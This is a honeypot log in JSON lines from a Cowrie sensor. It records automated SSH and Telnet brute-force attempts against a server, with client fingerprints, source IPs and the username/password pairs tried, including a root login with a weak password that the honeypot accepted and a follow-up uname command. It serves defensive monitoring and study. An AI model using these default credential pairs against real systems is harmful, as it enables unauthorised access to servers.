{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:07:55.718654Z","src_ip":"212.227.235.229","session":"323f5a2b7d06"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:07:55.974311Z","src_ip":"212.227.235.229","session":"323f5a2b7d06"}
{"eventid":"cowrie.login.success","username":"root","password":"123321","message":"login attempt [root/123321] succeeded","sensor":"my-vps","timestamp":"2025-08-28T07:07:56.743367Z","src_ip":"212.227.235.229","session":"323f5a2b7d06"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:07:57.273888Z","src_ip":"212.227.235.229","session":"323f5a2b7d06"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T07:07:57.274561Z","src_ip":"212.227.235.229","session":"323f5a2b7d06"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:07:57.531659Z","src_ip":"212.227.235.229","session":"323f5a2b7d06"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:07:57.532765Z","src_ip":"212.227.235.229","session":"323f5a2b7d06"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53510,"dst_ip":"1.2.3.4","dst_port":22,"session":"74cec0bbf011","protocol":"ssh","message":"New connection: 212.227.125.160:53510 (1.2.3.4:22) [session: 74cec0bbf011]","sensor":"my-vps","timestamp":"2025-08-28T07:08:05.663201Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:08:05.708876Z","src_ip":"212.227.125.160","session":"74cec0bbf011"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:08:05.884772Z","src_ip":"212.227.125.160","session":"74cec0bbf011"}
{"eventid":"cowrie.login.failed","username":"worker","password":"worker123","message":"login attempt [worker/worker123] failed","sensor":"my-vps","timestamp":"2025-08-28T07:08:06.757897Z","src_ip":"212.227.125.160","session":"74cec0bbf011"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:08:07.979671Z","src_ip":"212.227.125.160","session":"74cec0bbf011"}
{"eventid":"cowrie.session.connect","src_ip":"8.222.212.69","src_port":33064,"dst_ip":"1.2.3.4","dst_port":23,"session":"3f1bb058e450","protocol":"telnet","message":"New connection: 8.222.212.69:33064 (1.2.3.4:23) [session: 3f1bb058e450]","sensor":"my-vps","timestamp":"2025-08-28T07:08:08.684351Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45606,"dst_ip":"1.2.3.4","dst_port":22,"session":"e443ab72afe6","protocol":"ssh","message":"New connection: 212.227.235.229:45606 (1.2.3.4:22) [session: e443ab72afe6]","sensor":"my-vps","timestamp":"2025-08-28T07:08:12.364865Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:08:12.365527Z","src_ip":"212.227.235.229","session":"e443ab72afe6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:08:12.612286Z","src_ip":"212.227.235.229","session":"e443ab72afe6"}
{"eventid":"cowrie.login.failed","username":"worker","password":"worker123","message":"login attempt [worker/worker123] failed","sensor":"my-vps","timestamp":"2025-08-28T07:08:13.644623Z","src_ip":"212.227.235.229","session":"e443ab72afe6"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:08:14.894149Z","src_ip":"212.227.235.229","session":"e443ab72afe6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45544,"dst_ip":"1.2.3.4","dst_port":22,"session":"7a66650e5ccf","protocol":"ssh","message":"New connection: 212.227.125.160:45544 (1.2.3.4:22) [session: 7a66650e5ccf]","sensor":"my-vps","timestamp":"2025-08-28T07:08:22.337149Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:08:22.339864Z","src_ip":"212.227.125.160","session":"7a66650e5ccf"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:08:22.553730Z","src_ip":"212.227.125.160","session":"7a66650e5ccf"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"ftpuser123","message":"login attempt [ftpuser/ftpuser123] failed","sensor":"my-vps","timestamp":"2025-08-28T07:08:23.419921Z","src_ip":"212.227.125.160","session":"7a66650e5ccf"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:08:24.638026Z","src_ip":"212.227.125.160","session":"7a66650e5ccf"}
{"eventid":"cowrie.session.connect","src_ip":"8.222.212.69","src_port":52958,"dst_ip":"1.2.3.4","dst_port":23,"session":"adc523c5e2e8","protocol":"telnet","message":"New connection: 8.222.212.69:52958 (1.2.3.4:23) [session: adc523c5e2e8]","sensor":"my-vps","timestamp":"2025-08-28T07:08:24.943675Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36122,"dst_ip":"1.2.3.4","dst_port":22,"session":"11106e02cc52","protocol":"ssh","message":"New connection: 212.227.235.229:36122 (1.2.3.4:22) [session: 11106e02cc52]","sensor":"my-vps","timestamp":"2025-08-28T07:08:29.074023Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:08:29.074834Z","src_ip":"212.227.235.229","session":"11106e02cc52"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:08:29.326346Z","src_ip":"212.227.235.229","session":"11106e02cc52"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"ftpuser123","message":"login attempt [ftpuser/ftpuser123] failed","sensor":"my-vps","timestamp":"2025-08-28T07:08:30.082637Z","src_ip":"212.227.235.229","session":"11106e02cc52"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:08:31.335915Z","src_ip":"212.227.235.229","session":"11106e02cc52"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53392,"dst_ip":"1.2.3.4","dst_port":22,"session":"ec8ec6af6ed6","protocol":"ssh","message":"New connection: 212.227.125.160:53392 (1.2.3.4:22) [session: ec8ec6af6ed6]","sensor":"my-vps","timestamp":"2025-08-28T07:08:39.103333Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:08:39.108477Z","src_ip":"212.227.125.160","session":"ec8ec6af6ed6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:08:39.329219Z","src_ip":"212.227.125.160","session":"ec8ec6af6ed6"}
{"eventid":"cowrie.session.closed","duration":31.420424699783325,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:08:40.104709Z","src_ip":"8.222.212.69","session":"3f1bb058e450"}
{"eventid":"cowrie.login.failed","username":"admin","password":"password","message":"login attempt [admin/password] failed","sensor":"my-vps","timestamp":"2025-08-28T07:08:40.227336Z","src_ip":"212.227.125.160","session":"ec8ec6af6ed6"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:08:41.453751Z","src_ip":"212.227.125.160","session":"ec8ec6af6ed6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48668,"dst_ip":"1.2.3.4","dst_port":22,"session":"a88244352438","protocol":"ssh","message":"New connection: 212.227.235.229:48668 (1.2.3.4:22) [session: a88244352438]","sensor":"my-vps","timestamp":"2025-08-28T07:08:45.752571Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:08:45.753567Z","src_ip":"212.227.235.229","session":"a88244352438"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:08:45.999420Z","src_ip":"212.227.235.229","session":"a88244352438"}
{"eventid":"cowrie.login.failed","username":"admin","password":"password","message":"login attempt [admin/password] failed","sensor":"my-vps","timestamp":"2025-08-28T07:08:46.739335Z","src_ip":"212.227.235.229","session":"a88244352438"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:08:47.987522Z","src_ip":"212.227.235.229","session":"a88244352438"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55800,"dst_ip":"1.2.3.4","dst_port":22,"session":"1b283000240b","protocol":"ssh","message":"New connection: 212.227.125.160:55800 (1.2.3.4:22) [session: 1b283000240b]","sensor":"my-vps","timestamp":"2025-08-28T07:08:55.558540Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:08:55.559572Z","src_ip":"212.227.125.160","session":"1b283000240b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:08:55.786605Z","src_ip":"212.227.125.160","session":"1b283000240b"}
{"eventid":"cowrie.login.failed","username":"steam","password":"steam123","message":"login attempt [steam/steam123] failed","sensor":"my-vps","timestamp":"2025-08-28T07:08:56.444799Z","src_ip":"212.227.125.160","session":"1b283000240b"}
{"eventid":"cowrie.session.closed","duration":32.309569120407104,"message":"Connection lost after 32 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:08:57.253153Z","src_ip":"8.222.212.69","session":"adc523c5e2e8"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:08:57.664880Z","src_ip":"212.227.125.160","session":"1b283000240b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35112,"dst_ip":"1.2.3.4","dst_port":22,"session":"4b9a1a85c7cf","protocol":"ssh","message":"New connection: 212.227.235.229:35112 (1.2.3.4:22) [session: 4b9a1a85c7cf]","sensor":"my-vps","timestamp":"2025-08-28T07:09:02.200945Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:09:02.201692Z","src_ip":"212.227.235.229","session":"4b9a1a85c7cf"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:09:02.459525Z","src_ip":"212.227.235.229","session":"4b9a1a85c7cf"}
{"eventid":"cowrie.login.failed","username":"steam","password":"steam123","message":"login attempt [steam/steam123] failed","sensor":"my-vps","timestamp":"2025-08-28T07:09:03.280477Z","src_ip":"212.227.235.229","session":"4b9a1a85c7cf"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:09:04.541081Z","src_ip":"212.227.235.229","session":"4b9a1a85c7cf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34048,"dst_ip":"1.2.3.4","dst_port":22,"session":"dfbd4ac4c6d6","protocol":"ssh","message":"New connection: 212.227.125.160:34048 (1.2.3.4:22) [session: dfbd4ac4c6d6]","sensor":"my-vps","timestamp":"2025-08-28T07:09:12.262447Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:09:12.263393Z","src_ip":"212.227.125.160","session":"dfbd4ac4c6d6"}
